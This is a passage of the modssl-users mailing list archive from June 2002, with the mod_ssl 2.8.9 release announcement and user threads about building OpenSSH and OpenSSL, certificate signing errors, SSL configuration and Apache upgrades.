Date: Wed, 19 Jun 2002 13:47:02 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.9 for Apache 1.3.26
Message-ID: <20020619114702.GA25148@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On demand by the release of Apache 1.3.26 I've made available
mod_ssl 2.8.9. The details are appended below.

Fetch it from:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.9 (27-Mar-2002 to 19-Jun-2002)

   *) Upgraded to Apache 1.3.26.

   *) Support for OpenSSL 0.9.7.

   *) Open random files in binary mode under Win32 to not
      stop on EOS characters.

   *) Additional internal consistency check on vhost sanity checking
      in case no DNS entries are found for virtual hosts.

   *) Fixed detection of a faked "Faked Basic Auth" situation for
      internal redirection situations.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 16:53:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10024; Wed, 19 Jun 2002 16:52:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dragon.goamerica.net id QAA10009; Wed, 19 Jun 2002 16:51:57 +0200 (MET DST)
Received: by hunter.goamerica.net with Internet Mail Service (5.5.2653.19)
	id <2F00P938>; Wed, 19 Jun 2002 10:46:29 -0400
Message-ID: <304CFC651EDCD4118AA800D0B774AFB36F4A53@hunter.goamerica.net>
From: Shon Stephens 
To: "'modssl-users@modssl.org'" 
Subject: RE: Configuring openssh 3.2 won't work
Date: Wed, 19 Jun 2002 10:46:28 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Shon Stephens 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i believe that you should be using the following command to configure
openssl:
sh config --prefix=/whatever --openssldir=/whatever -Lzlib 

could actually be -lzlib (i can't remember)

also, once configure has run, i believe you should edit the Makefile and
find the line:
OPENSSLDIR=/usr/local/ssl

below this line add another line:
DEVRANDOM=/dev/random

-----Original Message-----
From: Jeff Landers [mailto:JL1@gty.ci.henderson.nv.us]
Sent: Tuesday, June 18, 2002 7:56 PM
To: modssl-users@modssl.org
Subject: Configuring openssh 3.2 won't work


I have been trying to build openssh but can't get it to work.

Solaris 8
openssl0.9.6c
zlib from sunfreeware.com
/dev/random patch installed

./configure --with-zlib=/usr/include --with-ssl-dir=/usr/local/ssl

The config log just shows many parse errors and symbol errors. What do I
need to do to get this to go?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 17:03:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10645; Wed, 19 Jun 2002 17:02:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from owl4.owl.co.uk id RAA10623; Wed, 19 Jun 2002 17:01:57 +0200 (MET DST)
Received: from ferret.owl.co.uk (ferret.owl.co.uk [192.168.150.61]) by owl4.owl.co.uk
 (Rockliffe SMTPRA 4.5.6) with ESMTP id  for ;
 Wed, 19 Jun 2002 16:01:49 +0100
Message-Id: <5.1.0.14.0.20020619155116.03155448@pophost.owl.co.uk>
X-Sender: colmm@pophost.owl.co.uk
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 19 Jun 2002 16:00:23 +0100
To: modssl-users@modssl.org
From: Colm McCartan 
Subject: sign.sh woes
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Colm McCartan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I *know* this has been done to death before but I just can't find any 
solutions anywhere on the net or in the archives: just lots of descriptions 
of the problem!

After running sign.sh I have the typical error:
-----------------------------------------------------------
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt: /C=UK/ST=Midlothian/L=Edinburgh/O=Panasonic 
OWL/OU=R&D/CN=oscar-demo.owl.co.uk/Email=admin@oscar-demo.owl.co.uk
error 18 at 0 depth lookup:self signed certificate
/C=UK/ST=Midlothian/L=Edinburgh/O=Panasonic 
OWL/OU=R&D/CN=oscar-demo.owl.co.uk/Email=admin@oscar-demo.owl.co.uk
error 7 at 0 depth lookup:certificate signature failure
--------------------------------------------------------------

My directory has the server.csr, the ca.key and ca.crt.

People have advised the use of the ssl.ca scripts in the contrib area but 
this is basically the same sign script!

Version: openssl-0.9.6

Does anybody have any suggestions on this? Also, the best way to clean up 
after it fails: just delete the generated certs db?

Cheers,
colm

................................................................
colm mccartan
panasonic owl uk
colmm@owl.co.uk
(44) 131 561 1035

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 19:01:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19011; Wed, 19 Jun 2002 19:00:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA18947; Wed, 19 Jun 2002 19:00:01 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 19 Jun 2002 09:59:55 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 19 Jun 2002 16:59:54 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Recent Security Problem
Date: Wed, 19 Jun 2002 16:59:54 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 19 Jun 2002 16:59:55.0381 (UTC) FILETIME=[BC7E5A50:01C217B2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have Apache 1.3.20 running with the following modssl file: 
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32

Does anyone have the procedure to upgrade the apache server from 1.3.20 to 
1.3.26 without affecting the SSL setup?

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 19:09:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA19846; Wed, 19 Jun 2002 19:08:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id TAA19826; Wed, 19 Jun 2002 19:07:38 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: Newbie question.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Wed, 19 Jun 2002 13:07:32 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Newbie question.
Thread-Index: AcIXs8sRrLWI/Sz2RXenX5J+87n6Xw==
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA19843
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am currently running apache 1.3.26 with openssl 0.9.6d and mod_ssl 2.8.9-1.3.26 and get the following error when attempting to access https://xyz.domain.dom:

**The page cannot be displayed**

In my httpd.conf file I have the following directives. I am not using virtual hosts as I am only running one site on the server.

#Main Server config.
#

#SSL Config.
#
SSLCertificateFile /path/to/server.crt
SSLCertificateKeyFile /path/to/server.key
#

#Port ...
port 443
#
#
....

In my .htaccess file I have the directive SSLRequireSSL

Any help would be appreciated.

Sincerely,

Brian Vaughan


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 19:20:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20485; Wed, 19 Jun 2002 19:19:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.webdms.com id TAA20432; Wed, 19 Jun 2002 19:18:27 +0200 (MET DST)
Received: from jdp2 (firewall.webdms.com [199.184.207.3]) by www.webdms.com (8.8.5/SCO5) with SMTP id LAA15846 for ; Wed, 19 Jun 2002 11:25:37 -0600 (MDT)
Message-ID: <001e01c217b7$bddfa5c0$0fa8a8c0@jdp2.webdms.com>
From: "Joe Pearson" 
To: 
Subject: Re: Newbie question.
Date: Wed, 19 Jun 2002 11:35:44 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3110.5
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Joe Pearson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What does your error_log say?
--
Joe Pearson
Database Management Services, Inc.
208-384-1311 ext. 11
http://www.webdms.com

-----Original Message-----
From: Brian F. Vaughan 
To: modssl-users@modssl.org 
Date: Wednesday, June 19, 2002 11:17 AM
Subject: Newbie question.


>I am currently running apache 1.3.26 with openssl 0.9.6d and mod_ssl
2.8.9-1.3.26 and get the following error when attempting to access
https://xyz.domain.dom:
>
>**The page cannot be displayed**
>
>In my httpd.conf file I have the following directives. I am not using
virtual hosts as I am only running one site on the server.
>
>#Main Server config.
>#
>
>#SSL Config.
>#
>SSLCertificateFile /path/to/server.crt
>SSLCertificateKeyFile /path/to/server.key
>#
>
>#Port ...
>port 443
>#
>#
>....
>
>In my .htaccess file I have the directive SSLRequireSSL
>
>Any help would be appreciated.
>
>Sincerely,
>
>Brian Vaughan
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 19:29:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21057; Wed, 19 Jun 2002 19:28:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id TAA21041; Wed, 19 Jun 2002 19:27:51 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: Newbie question.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Wed, 19 Jun 2002 13:27:45 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Newbie question.
Thread-Index: AcIXtbFrJ41n1ObrRZefWN1D2KT7ugAALZRw
From: "Brian F. Vaughan" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id TAA21054
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Here's what I found in my error_log:

[Wed Jun 19 12:46:15 2002] [error] [client 64.2.72.226] Invalid method in request L
[Wed Jun 19 12:46:19 2002] [error] [client 64.2.72.226] Invalid method in request L

Brian Vaughan



-----Original Message-----
From: Joe Pearson [mailto:joe@webdms.com]
Sent: Wednesday, June 19, 2002 1:36 PM
To: modssl-users@modssl.org
Subject: Re: Newbie question.


What does your error_log say?
--
Joe Pearson
Database Management Services, Inc.
208-384-1311 ext. 11
http://www.webdms.com

-----Original Message-----
From: Brian F. Vaughan 
To: modssl-users@modssl.org 
Date: Wednesday, June 19, 2002 11:17 AM
Subject: Newbie question.


>I am currently running apache 1.3.26 with openssl 0.9.6d and mod_ssl
2.8.9-1.3.26 and get the following error when attempting to access
https://xyz.domain.dom:
>
>**The page cannot be displayed**
>
>In my httpd.conf file I have the following directives. I am not using
virtual hosts as I am only running one site on the server.
>
>#Main Server config.
>#
>
>#SSL Config.
>#
>SSLCertificateFile /path/to/server.crt
>SSLCertificateKeyFile /path/to/server.key
>#
>
>#Port ...
>port 443
>#
>#
>....
>
>In my .htaccess file I have the directive SSLRequireSSL
>
>Any help would be appreciated.
>
>Sincerely,
>
>Brian Vaughan
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 19:58:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA22579; Wed, 19 Jun 2002 19:57:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta02-svc.ntlworld.com id TAA22530; Wed, 19 Jun 2002 19:56:25 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020619175625.RAJS4626.mta02-svc.ntlworld.com@ws>
          for ; Wed, 19 Jun 2002 18:56:25 +0100
Message-ID: <093f01c217b9$bc530060$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: undefined symbol: ssl_log_ssl_error
Date: Wed, 19 Jun 2002 18:49:59 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Have had an error with 'Failed to acquire global mutex lock' so downloaded
an updated version of mod_ssl.c from

http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/ssl/mod_ssl.c?rev=1.63&c
ontent-type=text/vnd.viewcvs-markup

Then re-installed apache 2.0.36  with:
./configure --with-ssl=/usr/local/openssl --enable-ssl=shared --prefix=/usr/
local/ap

Now when I try to start apache I get:
Cannot load modules/mod_ssl.so into server: modules/mod_ssl.so undefined
symbol: ssl_log_ssl_error

Can anyone suggest where I should go from here?

Thanks

Zac

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23949; Wed, 19 Jun 2002 20:12:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id UAA23898; Wed, 19 Jun 2002 20:11:08 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 6556FBD2C; Wed, 19 Jun 2002 20:11:46 +0200 (CEST)
Date: Wed, 19 Jun 2002 20:11:46 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: undefined symbol: ssl_log_ssl_error
Message-ID: <20020619181146.GA12842@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <093f01c217b9$bc530060$667ba8c0@ws>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <093f01c217b9$bc530060$667ba8c0@ws>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jun 19, 2002 at 06:49:59PM +0100, Zac Hillier wrote:
> Can anyone suggest where I should go from here?
> 
Apache 2.0.39

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:31:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA25424; Wed, 19 Jun 2002 20:30:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id UAA25289; Wed, 19 Jun 2002 20:28:44 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: Another newbie question.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Wed, 19 Jun 2002 14:28:36 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Another newbie question.
Thread-Index: AcIXvx6qaEZWnBMfQVG3wgsSC6/Mkg==
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA25308
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Could some point me to, or send me an example httpd.conf file for a server running SSL?

Thanks,

Brian Vaughan

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:36:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA25863; Wed, 19 Jun 2002 20:35:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA25765; Wed, 19 Jun 2002 20:34:13 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5JIVNn01193
	for ; Wed, 19 Jun 2002 14:31:23 -0400
Date: Wed, 19 Jun 2002 14:31:23 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Another newbie question.
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002, Brian F. Vaughan wrote:

> Could some point me to, or send me an example httpd.conf file for a
> server running SSL?

mod_ssl ships with a sample config file that should be sufficient for a
basic setup.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:39:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26081; Wed, 19 Jun 2002 20:38:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from jive.SoftHome.net id UAA26043; Wed, 19 Jun 2002 20:38:02 +0200 (MET DST)
Received: (qmail 28879 invoked by uid 417); 19 Jun 2002 18:38:01 -0000
Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12)
  by shunt-smtp-out-0 with SMTP; 19 Jun 2002 18:38:01 -0000
Received: from electrocute ([212.64.49.217])
  (AUTH: LOGIN richard.mail@softhome.net)
  by softhome.net with esmtp; Wed, 19 Jun 2002 12:37:54 -0600
From: "Richard Pijnenburg" 
To: modssl-users@modssl.org
Subject: mod_ssl for apache 2.0.39
Date: Wed, 19 Jun 2002 20:37:50 +0200
Message-ID: <000301c217c0$701db530$1f00a8c0@electrocute>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0004_01C217D1.33A68530"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richard Pijnenburg" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0004_01C217D1.33A68530
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit

When will there be an mod_ssl version for apache 2.0.39 ???
 
Greetz,
 
Richard

------=_NextPart_000_0004_01C217D1.33A68530
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






















When will there be an mod_ssl =
version for
apache 2.0.39 =
???



 



Greetz,



 



Richard









------=_NextPart_000_0004_01C217D1.33A68530--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:40:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26124; Wed, 19 Jun 2002 20:39:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id UAA26103; Wed, 19 Jun 2002 20:38:53 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: Another newbie question.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Wed, 19 Jun 2002 14:38:47 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: Another newbie question.
Thread-Index: AcIXwGhnTDI8+2slQ5WyP2Xowvb8RwAABljg
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA26111
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks! I'll check it out.

Brian Vaughan



-----Original Message-----
From: Cliff Woolley [mailto:jwoolley@apache.org]
Sent: Wednesday, June 19, 2002 2:31 PM
To: modssl-users@modssl.org
Subject: Re: Another newbie question.


On Wed, 19 Jun 2002, Brian F. Vaughan wrote:

> Could some point me to, or send me an example httpd.conf file for a
> server running SSL?

mod_ssl ships with a sample config file that should be sufficient for a
basic setup.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:45:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26524; Wed, 19 Jun 2002 20:44:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA26464; Wed, 19 Jun 2002 20:43:28 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5JIecM01290
	for ; Wed, 19 Jun 2002 14:40:38 -0400
Date: Wed, 19 Jun 2002 14:40:38 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: mod_ssl for apache 2.0.39
In-Reply-To: <000301c217c0$701db530$1f00a8c0@electrocute>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 19 Jun 2002, Richard Pijnenburg wrote:

> When will there be an mod_ssl version for apache 2.0.39 ???

Apache 2.0 ships with mod_ssl.  Look in the 2.0.39 tarball and you'll find
mod_ssl sitting right there.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:46:57 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26584; Wed, 19 Jun 2002 20:45:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id UAA26533; Wed, 19 Jun 2002 20:44:49 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 19 Jun 2002 14:44:00 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache 1.3.26 and mod_ssl
Date: Wed, 19 Jun 2002 14:44:46 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C217C1.627B2600"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C217C1.627B2600
Content-Type: text/plain;
	charset="iso-8859-1"

Thanks for the good work, Ralph.


Henning Sittler
www.inscriber.com



mod_ssl 2.8.9 will be released within a few hours. Just be patient, please.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C217C1.627B2600
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Apache 1.3.26 and mod_ssl




Thanks for the good work, Ralph.






Henning Sittler

www.inscriber.com








mod_ssl 2.8.9 will be released within a few hours. =
Just be patient, please.




          &nb=
sp;           &nb=
sp;           &nb=
sp;    Ralf S. Engelschall

          &nb=
sp;           &nb=
sp;           &nb=
sp;    rse@engelschall.com

          &nb=
sp;           &nb=
sp;           &nb=
sp;    www.engelschall.com

_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C217C1.627B2600--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 19 20:47:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26680; Wed, 19 Jun 2002 20:46:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
